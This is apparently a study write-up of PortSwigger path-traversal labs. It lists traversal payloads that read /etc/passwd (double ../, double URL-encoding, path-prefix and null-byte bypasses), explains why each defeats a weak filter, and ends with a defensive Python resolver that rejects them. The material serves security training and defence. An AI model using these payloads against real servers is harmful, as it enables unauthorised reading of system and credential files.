Path Traversal - PortSwigger

Path Traversal Cheat Sheet

  • Agartha Burp Extension

  • Simple Case
../../../../../../../../../../../etc/passwd
  • Absolute Path
/etc/passwd
  • Double ../
....//....//....//....//....//....//etc/passwd
  • Double URL-Encode ../
%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65%25%32%66%25%32%65%25%32%65/etc/passwd
  • Validation of start of path
/var/www/images/../../../../../../etc/passwd
  • Null Byte
../../../../../../../etc/passwd%00.jpg

Absolute path bypass with blocked sequences || File path traversal, traversal sequences blocked with absolute path bypass

If we try the basic path traversal payload, we see that the server does not return the file.

When we use the absolute path instead, the server does return the file contents.

Traversal sequences stripped non-recursively || File path traversal, traversal sequences stripped non-recursively

We test the basic payload and see that it does not pass validation.

To bypass the block we can use the double ../ form: the filter only strips ../ once, and what remains after that single pass is again a valid traversal sequence.

Bypass with double URL decoding || File path traversal, traversal sequences stripped with superfluous URL-decode

We test the basic LFI payload and see that it is rejected.

With the Agartha extension we generate a wordlist of encoded variants of the payload.

With the double URL-encoded payload we bypass the restriction: the filter decodes once and finds no traversal sequence, and a later decode restores ../ before the file is opened.

Validation of the start of the path || File path traversal, validation of start of path

We see the server loading an image by its absolute path.

If we try a path traversal payload on its own in place of the jpg file, we see that the server does not return the contents of /etc/passwd.

If we do the same but starting from the images directory (so the path still begins with the expected prefix), we see that it does let us read the contents of /etc/passwd.

Bypass with null byte and extension validation || File path traversal, validation of file extension with null byte bypass

We try to inject the basic payload and see that the server does not allow us to read the contents of /etc/passwd.

To read the contents we can use a null byte. In C-based filesystem calls the string ends at the null byte, so whatever is appended after it (here the forced .jpg extension) is ignored: the validation sees a path ending in .jpg while the server actually opens /etc/passwd.
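As an added example (not PortSwigger's lab code, and not part of the original notes), the following resolver shows the defensive counterpart to every technique in this cheat sheet: it percent-decodes to a fixed point, rejects null bytes, canonicalises the joined path and only then checks containment, instead of stripping ../ or checking a prefix on the raw string. The base directory /var/www/images, the file names and the helper names are assumptions for illustration; strip_once reproduces the flawed single-pass filter from the non-recursive lab purely to show why it fails.

```python
"""Canonicalise-then-check path resolution (added example, not lab code)."""
import os
from urllib.parse import unquote

# Constructed base directory, mirroring the labs' image folder.
BASE_DIR = "/var/www/images"


class UnsafePathError(ValueError):
    """Raised when a user-supplied path would resolve outside the base."""


def strip_once(user_path: str) -> str:
    """The flawed filter from the non-recursive lab: one pass of removal.

    Kept only to demonstrate why stripping is not a fix; ....// survives
    a single pass as ../ and the check is defeated.
    """
    return user_path.replace("../", "")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing.

    A single decode turns %252e%252e into %2e%2e, which a later layer may
    decode again; decoding to a fixed point removes that ambiguity.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise UnsafePathError("too many layers of URL encoding")


def safe_resolve(base_dir: str, user_path: str) -> str:
    """Return an absolute path guaranteed to lie under base_dir, else raise."""
    decoded = fully_decode(user_path)
    if "\x00" in decoded:
        # A NUL would truncate the path inside C-level filesystem calls,
        # so the extension the validator sees is not the one that is opened.
        raise UnsafePathError("null byte in path")
    base = os.path.realpath(base_dir)
    # Join without stripping anything: an absolute user path replaces base
    # here, and realpath collapses every .. and symlink into canonical form.
    candidate = os.path.realpath(os.path.join(base, decoded))
    # Containment is decided on the canonical path, never on a raw prefix,
    # so /var/www/images/../../etc/passwd is rejected as well.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePathError(f"path escapes base directory: {user_path!r}")
    return candidate


def is_safe(user_path: str, base_dir: str = BASE_DIR) -> bool:
    """Boolean wrapper around safe_resolve for quick checks."""
    try:
        safe_resolve(base_dir, user_path)
        return True
    except UnsafePathError:
        return False


if __name__ == "__main__":
    # Constructed inputs: the cheat-sheet payloads plus two legitimate names.
    samples = [
        "cat.jpg",
        "thumbs/../cat.jpg",
        "../../../../../../../../../../../etc/passwd",
        "/etc/passwd",
        "....//....//....//....//....//....//etc/passwd",
        "%25%32%65%25%32%65%25%32%66" * 5 + "/etc/passwd",
        "/var/www/images/../../../../../../etc/passwd",
        "../../../../../../../etc/passwd%00.jpg",
    ]
    for sample in samples:
        print(f"{'ALLOW' if is_safe(sample) else 'REJECT':6} {sample}")
    print("single-pass strip leaves:", strip_once("....//....//etc/passwd"))
```

Note that the ....// payload is reported as allowed: with no stripping it resolves literally to a (nonexistent) file named under /var/www/images/..../..../etc/, which is still inside the base, so canonicalisation makes the double-dot trick pointless rather than dangerous. The same resolver rejects the absolute path, the prefix-satisfying path, the double-encoded sequence and the null byte, which is the whole list of bypasses above.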